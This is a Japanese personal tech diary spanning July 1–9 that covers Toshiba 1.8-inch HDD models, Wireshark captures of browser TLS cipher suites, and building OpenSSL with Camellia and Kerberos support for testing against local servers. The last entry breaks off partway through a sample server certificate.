■ 7/1
1年前に東芝の 1.8 インチ HDD を調べたのだけど、ちょうど1年経ったので、
また調べてみることにした。
| 20G | 30G | 40G | 60G | 80G | 100G | 120G | 160G
|
5mm厚 | MK2004GAL MK2006GAL | MK3006GAL | MK4007GAL
|
8mm厚 | MK2003GAH MK2004GAH MK2006GAH | MK3004GAH | MK4004GAH MK4006GAH | MK6006GAH | MK8007GAH
|
5mm厚ZIF | MK2008GAL | MK3008GAL | MK4009GAL
|
8mm厚ZIF | | | MK4008GAH | MK6008GAH | MK8009GAH
|
5mm厚LIF | | | | MK6028GAL | MK8025GAL
|
8mm厚LIF | | | | | | MK1011GAH | MK1214GAH
|
5mm厚MSATA |
|
8mm厚MSATA | | | | | MK8016GSG MK8017GSG | | MK1216GSG | MK1617GSG
|
東芝のページにある MK8016GAS というのは、TYPO なんでしょう。それにしても、
1年で8つほど増えてることを考えると、時代が進むのは早いな、なんて感じる。
■ 7/2
screen だとスクロールバーが使えなくなってしまう、と先月書いた気がしたの
だけど(書いてなかった…)、Poderosa の設定でスクロールバーがちゃんと使える
ことがわかった。[ツール]→[オプション]→[ターミナル] の設定にある
アプリケーションモードでもスクロールを許可する
というのにチェックを入れるだけ。これで screen を使っていてもスクロールバーを
使えるようになった。今のところ、他に影響が出てないし、便利になった。
■ 7/3
wireshark 0.99.6a を使っていて Firefox 2.0.0.15 の https 通信を眺めていたの
だけど、Client Hello で。
Cipher Suites (28 suites)
Cipher Suite: Unknown (0xc00a)
Cipher Suite: Unknown (0xc014)
Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)
Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038)
Cipher Suite: Unknown (0xc00f)
Cipher Suite: Unknown (0xc005)
Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
Cipher Suite: Unknown (0xc007)
Cipher Suite: Unknown (0xc009)
Cipher Suite: Unknown (0xc011)
Cipher Suite: Unknown (0xc013)
Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)
Cipher Suite: TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032)
Cipher Suite: Unknown (0xc00c)
Cipher Suite: Unknown (0xc00e)
Cipher Suite: Unknown (0xc002)
Cipher Suite: Unknown (0xc004)
Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004)
Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005)
Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f)
Cipher Suite: Unknown (0xc008)
Cipher Suite: Unknown (0xc012)
Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016)
Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013)
Cipher Suite: Unknown (0xc00d)
Cipher Suite: Unknown (0xc003)
Cipher Suite: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA (0xfeff)
Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a)
な感じで Unknown だらけ。そんな古い wireshark じゃないのにな、と思いながら
とりあえず、wireshark 1.0.1 にしてみた。
Cipher Suites (28 suites)
Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a)
Cipher Suite: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)
Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)
Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038)
Cipher Suite: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA (0xc00f)
Cipher Suite: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA (0xc005)
Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
Cipher Suite: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (0xc007)
Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (0xc009)
Cipher Suite: TLS_ECDHE_RSA_WITH_RC4_128_SHA (0xc011)
Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)
Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)
Cipher Suite: TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032)
Cipher Suite: TLS_ECDH_RSA_WITH_RC4_128_SHA (0xc00c)
Cipher Suite: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA (0xc00e)
Cipher Suite: TLS_ECDH_ECDSA_WITH_RC4_128_SHA (0xc002)
Cipher Suite: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA (0xc004)
Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004)
Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005)
Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f)
Cipher Suite: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc008)
Cipher Suite: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (0xc012)
Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016)
Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013)
Cipher Suite: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA (0xc00d)
Cipher Suite: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc003)
Cipher Suite: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA (0xfeff)
Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a)
となる。RFC4492 周りのがちゃんと表示されるようになった。が、しかし、何で
ECC 暗号の要求が半分以上なんだ?Firefox は。別に問題ないけど、対応している
Apache ってそんなに無い気がする。
■ 7/4
昨日のついでに IE7 / Opera の Cipher Suite を見てみた。IE7 (7.0.5730.13)
のデフォルトでは。
Cipher Suites (11 suites)
Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004)
Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005)
Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a)
Cipher Suite: TLS_RSA_WITH_DES_CBC_SHA (0x0009)
Cipher Suite: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA (0x0064)
Cipher Suite: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA (0x0062)
Cipher Suite: TLS_RSA_EXPORT_WITH_RC4_40_MD5 (0x0003)
Cipher Suite: TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 (0x0006)
Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013)
Cipher Suite: TLS_DHE_DSS_WITH_DES_CBC_SHA (0x0012)
Cipher Suite: TLS_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA (0x0063)
Opera 9.51 のデフォルトでは。
Cipher Suites (17 suites)
Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)
Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038)
Cipher Suite: TLS_DH_RSA_WITH_AES_256_CBC_SHA (0x0037)
Cipher Suite: TLS_DH_DSS_WITH_AES_256_CBC_SHA (0x0036)
Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)
Cipher Suite: TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032)
Cipher Suite: TLS_DH_RSA_WITH_AES_128_CBC_SHA (0x0031)
Cipher Suite: TLS_DH_DSS_WITH_AES_128_CBC_SHA (0x0030)
Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f)
Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005)
Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004)
Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013)
Cipher Suite: TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA (0x000d)
Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016)
Cipher Suite: TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA (0x0010)
Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a)
Opera では TLS 1.1 対応、みたいに書いてあったのだけど、Client Hello を
見てみると、
Version: TLS 1.0 (0x0301)
なんだよなぁ。どうやったら TLS 1.1 になるんだろうか。
■ 7/5
昨日の続き。Opera で何度かアクセスすると、TLS 1.1 のパケットが出てきた。
Secure Socket Layer
TLSv1 Record Layer: Handshake Protocol: Client Hello
Content Type: Handshake (22)
Version: TLS 1.0 (0x0301)
Length: 113
Handshake Protocol: Client Hello
Handshake Type: Client Hello (1)
Length: 109
Version: TLS 1.1 (0x0302)
Random
こんな感じ。Client Hello の Cipher Suite は同じものを投げているみたい。
wget / curl / openssl s_client 辺りで、TLS 1.1 を対応してくれると、非常に
楽なんだけどなぁ。
■ 7/6
ものはついでなんで、openssl を最新の 0.9.8h にして、CAMELLIA や SEED を
組み込んでみた。
[toyota@dstar]% tar xvfz openssl-0.9.8h.tar.gz
[toyota@dstar]% cd openssl-0.9.8h
[toyota@dstar]% ./config enable-krb5 enable-camellia enable-seed enable-idea
[toyota@dstar]% make
無事通ったみたいなので、テストしてみる。
[toyota@dstar]% ./apps/openssl ciphers -v
DHE-RSA-AES256-SHA SSLv3 Kx=DH Au=RSA Enc=AES(256) Mac=SHA1
DHE-DSS-AES256-SHA SSLv3 Kx=DH Au=DSS Enc=AES(256) Mac=SHA1
AES256-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1
DHE-RSA-CAMELLIA256-SHA SSLv3 Kx=DH Au=RSA Enc=Camellia(256) Mac=SHA1
DHE-DSS-CAMELLIA256-SHA SSLv3 Kx=DH Au=DSS Enc=Camellia(256) Mac=SHA1
CAMELLIA256-SHA SSLv3 Kx=RSA Au=RSA Enc=Camellia(256) Mac=SHA1
EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1
EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1
DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1
DES-CBC3-MD5 SSLv2 Kx=RSA Au=RSA Enc=3DES(168) Mac=MD5
DHE-RSA-AES128-SHA SSLv3 Kx=DH Au=RSA Enc=AES(128) Mac=SHA1
DHE-DSS-AES128-SHA SSLv3 Kx=DH Au=DSS Enc=AES(128) Mac=SHA1
AES128-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1
DHE-RSA-SEED-SHA SSLv3 Kx=DH Au=RSA Enc=SEED(128) Mac=SHA1
DHE-DSS-SEED-SHA SSLv3 Kx=DH Au=DSS Enc=SEED(128) Mac=SHA1
SEED-SHA SSLv3 Kx=RSA Au=RSA Enc=SEED(128) Mac=SHA1
DHE-RSA-CAMELLIA128-SHA SSLv3 Kx=DH Au=RSA Enc=Camellia(128) Mac=SHA1
DHE-DSS-CAMELLIA128-SHA SSLv3 Kx=DH Au=DSS Enc=Camellia(128) Mac=SHA1
CAMELLIA128-SHA SSLv3 Kx=RSA Au=RSA Enc=Camellia(128) Mac=SHA1
IDEA-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=IDEA(128) Mac=SHA1
IDEA-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=IDEA(128) Mac=MD5
RC2-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC2(128) Mac=MD5
RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1
RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
RC4-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1
EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1
DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1
DES-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=DES(56) Mac=MD5
EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC2-CBC-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
EXP-RC4-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
なんか、Kerberos5 が入ってない気がするけど、ここは見なかったことにして。
とりあえず、Camellia の要求をサーバに投げてみる。
[toyota@dstar]% ./apps/openssl s_client -tls1 -connect 192.168.0.77:443 -cipher
'CAMELLIA'
CONNECTED(00000003)
24342:error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure
:s3_pkt.c:1053:SSL alert number 40
24342:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt
.c:530:
ま、手元のサーバは対応してないわな。とりあえず、Cipher Suite を見てみた。
Cipher Suites (8 suites)
Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA (0x0089)
Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0088)
Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA (0x0087)
Cipher Suite: TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0084)
Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA (0x0046)
Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0045)
Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA (0x0044)
Cipher Suite: TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0041)
CAMELLIA のみ。ありえないクライアントだ。で、1つ気になったことが。IIS6 に
対して CAMELLIA のみで投げてみたら。
[toyota@dstar]% ./apps/openssl s_client -tls1 -connect 192.168.0.92:443 -cipher
'CAMELLIA'
CONNECTED(00000003)
24335:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt
.c:530:
Wireshark で見てみると、Client Hello のあと、いきなり FIN ACK を投げられて
しまう。言葉通りの、理由もなしに。嫌な感じである。
■ 7/7
近くにあった CentOS 5.1 の OpenSSL のバージョンを見てみた。RPM のもので、
[toyota@centos5]% openssl version
OpenSSL 0.9.8b 04 May 2006
[toyota@centos5]% openssl ciphers -v
DHE-RSA-AES256-SHA SSLv3 Kx=DH Au=RSA Enc=AES(256) Mac=SHA1
DHE-DSS-AES256-SHA SSLv3 Kx=DH Au=DSS Enc=AES(256) Mac=SHA1
AES256-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1
EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1
EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1
DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1
DES-CBC3-MD5 SSLv2 Kx=RSA Au=RSA Enc=3DES(168) Mac=MD5
DHE-RSA-AES128-SHA SSLv3 Kx=DH Au=RSA Enc=AES(128) Mac=SHA1
DHE-DSS-AES128-SHA SSLv3 Kx=DH Au=DSS Enc=AES(128) Mac=SHA1
AES128-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1
RC2-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC2(128) Mac=MD5
DHE-DSS-RC4-SHA SSLv3 Kx=DH Au=DSS Enc=RC4(128) Mac=SHA1
EXP-KRB5-RC4-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(40) Mac=MD5 export
EXP-KRB5-RC4-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(40) Mac=SHA1 export
KRB5-RC4-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(128) Mac=MD5
KRB5-RC4-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(128) Mac=SHA1
RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1
RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
RC4-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
KRB5-DES-CBC3-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=3DES(168) Mac=MD5
KRB5-DES-CBC3-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=3DES(168) Mac=SHA1
EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=DES(56) Mac=SHA1 export
EXP1024-DES-CBC-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56) Mac=SHA1 export
KRB5-DES-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(56) Mac=MD5
KRB5-DES-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(56) Mac=SHA1
EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1
EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1
DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1
DES-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=DES(56) Mac=MD5
EXP1024-DHE-DSS-RC4-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=RC4(56) Mac=SHA1 export
EXP1024-RC4-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=SHA1 export
EXP-KRB5-RC2-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC2(40) Mac=MD5 export
EXP-KRB5-DES-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(40) Mac=MD5 export
EXP-KRB5-RC2-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC2(40) Mac=SHA1 export
EXP-KRB5-DES-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(40) Mac=SHA1 export
EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC2-CBC-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
EXP-RC4-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
な感じ。Kerberos5 系がちゃんと組み込まれているみたい。CentOS 3.8 の環境に
Camellia / Kerberos5 対応の最新の OpenSSL をコンパイルしてみる。
[toyota@dstar]% tar xvfz openssl-0.9.8h.tar.gz
[toyota@dstar]% cd openssl-0.9.8h
いろいろやってわかったことは、--with-krb5-include / --with-krb5-lib 指定に
ディレクトリじゃなくて、-I や -L をつけたコンパイルオプションを指定すること、
--with-krb5-flavor は MIT / Heimdal の指定だけど、Heimdal は対応していない
ということ。試しに Heimdal を指定すると。
[toyota@dstar]% ./config enable-krb5 enable-camellia enable-seed enable-idea --
with-krb5-flavor=Heimdal --with-krb5-include="-I/usr/kerberos/include" --with-k
rb5-lib="-L/usr/kerberos/lib -lkrb5"
Operating system: i686-whatever-linux2
Configuring for linux-elf
Configuring for linux-elf
no-cms [default] OPENSSL_NO_CMS (skip dir)
no-gmp [default] OPENSSL_NO_GMP (skip dir)
no-mdc2 [default] OPENSSL_NO_MDC2 (skip dir)
no-montasm [default]
no-rc5 [default] OPENSSL_NO_RC5 (skip dir)
no-rfc3779 [default] OPENSSL_NO_RFC3779 (skip dir)
no-shared [default]
no-tlsext [default] OPENSSL_NO_TLSEXT (skip dir)
no-zlib [default]
no-zlib-dynamic [default]
IsMK1MF=0
Sorry, Heimdal is currently not supported
となる。結局。
[toyota@dstar]% ./config enable-krb5 enable-camellia enable-seed enable-rc5 ena
ble-idea --with-krb5-flavor=MIT --with-krb5-include="-I/usr/kerberos/include" -
-with-krb5-lib="-L/usr/kerberos/lib -lkrb5"
[toyota@dstar]% make
[toyota@dstar]% ./apps/openssl ciphers -v
DHE-RSA-AES256-SHA SSLv3 Kx=DH Au=RSA Enc=AES(256) Mac=SHA1
DHE-DSS-AES256-SHA SSLv3 Kx=DH Au=DSS Enc=AES(256) Mac=SHA1
AES256-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1
DHE-RSA-CAMELLIA256-SHA SSLv3 Kx=DH Au=RSA Enc=Camellia(256) Mac=SHA1
DHE-DSS-CAMELLIA256-SHA SSLv3 Kx=DH Au=DSS Enc=Camellia(256) Mac=SHA1
CAMELLIA256-SHA SSLv3 Kx=RSA Au=RSA Enc=Camellia(256) Mac=SHA1
KRB5-DES-CBC3-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=3DES(168) Mac=MD5
KRB5-DES-CBC3-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=3DES(168) Mac=SHA1
EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1
EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1
DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1
DES-CBC3-MD5 SSLv2 Kx=RSA Au=RSA Enc=3DES(168) Mac=MD5
DHE-RSA-AES128-SHA SSLv3 Kx=DH Au=RSA Enc=AES(128) Mac=SHA1
DHE-DSS-AES128-SHA SSLv3 Kx=DH Au=DSS Enc=AES(128) Mac=SHA1
AES128-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1
DHE-RSA-SEED-SHA SSLv3 Kx=DH Au=RSA Enc=SEED(128) Mac=SHA1
DHE-DSS-SEED-SHA SSLv3 Kx=DH Au=DSS Enc=SEED(128) Mac=SHA1
SEED-SHA SSLv3 Kx=RSA Au=RSA Enc=SEED(128) Mac=SHA1
DHE-RSA-CAMELLIA128-SHA SSLv3 Kx=DH Au=RSA Enc=Camellia(128) Mac=SHA1
DHE-DSS-CAMELLIA128-SHA SSLv3 Kx=DH Au=DSS Enc=Camellia(128) Mac=SHA1
CAMELLIA128-SHA SSLv3 Kx=RSA Au=RSA Enc=Camellia(128) Mac=SHA1
KRB5-IDEA-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=IDEA(128) Mac=MD5
KRB5-IDEA-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=IDEA(128) Mac=SHA1
IDEA-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=IDEA(128) Mac=SHA1
IDEA-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=IDEA(128) Mac=MD5
RC2-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC2(128) Mac=MD5
KRB5-RC4-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(128) Mac=MD5
KRB5-RC4-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(128) Mac=SHA1
RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1
RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
RC4-MD5 SSLv2 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
KRB5-DES-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(56) Mac=MD5
KRB5-DES-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(56) Mac=SHA1
EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1
EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1
DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1
DES-CBC-MD5 SSLv2 Kx=RSA Au=RSA Enc=DES(56) Mac=MD5
EXP-KRB5-RC2-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC2(40) Mac=MD5 export
EXP-KRB5-DES-CBC-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(40) Mac=MD5 export
EXP-KRB5-RC2-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC2(40) Mac=SHA1 export
EXP-KRB5-DES-CBC-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=DES(40) Mac=SHA1 export
EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC2-CBC-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-KRB5-RC4-MD5 SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(40) Mac=MD5 export
EXP-KRB5-RC4-SHA SSLv3 Kx=KRB5 Au=KRB5 Enc=RC4(40) Mac=SHA1 export
EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
EXP-RC4-MD5 SSLv2 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export
と、組み込み完了。明日は、時間があれば Camellia 対応 Apache を作ってテスト
してみようかな。
■ 7/8
なんか、centos5 で検索しようとして、cwntos5 と間違えて入力して検索をして
しまった。出てきたページが自分のページ1件だったので、軽くショック。間違えた
綴りで書いていたことと、その間違えた綴りで書いたのは世界で私だけだったという
ことと。恥ずかしいので、こっそり昔のページを直しておいた。
■ 7/9
OpenSSL を CAMELLIA 対応にして、Apache もコンパイルし直してみた。Apache は
configure に --with-ssl の指定をしただけだけど。これで、通信をしてみた。
とりあえず、openssl コマンドを使って。
[toyota@dstar]% ./openssl s_client -connect localhost:443 -cipher 'CAMELLIA'
CONNECTED(00000003)
depth=0 /C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/C
N=www.snakeoil.dom/emailAddress=www@snakeoil.dom
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 /C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/C
N=www.snakeoil.dom/emailAddress=www@snakeoil.dom
verify error:num=27:certificate not trusted
verify return:1
depth=0 /C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/C
N=www.snakeoil.dom/emailAddress=www@snakeoil.dom
verify error:num=21:unable to verify the first certificate
verify return:1
---
Certificate chain
0 s:/C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Webserver Team/CN=w
ww.snakeoil.dom/emailAddress=www@snakeoil.dom
i:/C=XY/ST=Snake Desert/L=Snake Town/O=Snake Oil, Ltd/OU=Certificate Authori
ty/CN=Snake Oil CA/emailAddress=ca@snakeoil.dom
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIDNjCCAp+gAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMAkGA1UEBhMCWFkx
FTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2UgVG93bjEXMBUG
A1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZmljYXRlIEF1dGhv
cml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhvcNAQkBFg9jYUBz
bmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMTgyMTUxWjCBpzEL
MAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25h
a2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBgNVBAsTDldlYnNl
cnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR8wHQYJKoZIhvcN
AQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC554Ro+VH0dJONqljPBW+C72MDNGNy9eXnzejXrczsHs3Pc92Vaat6CpIEEGue
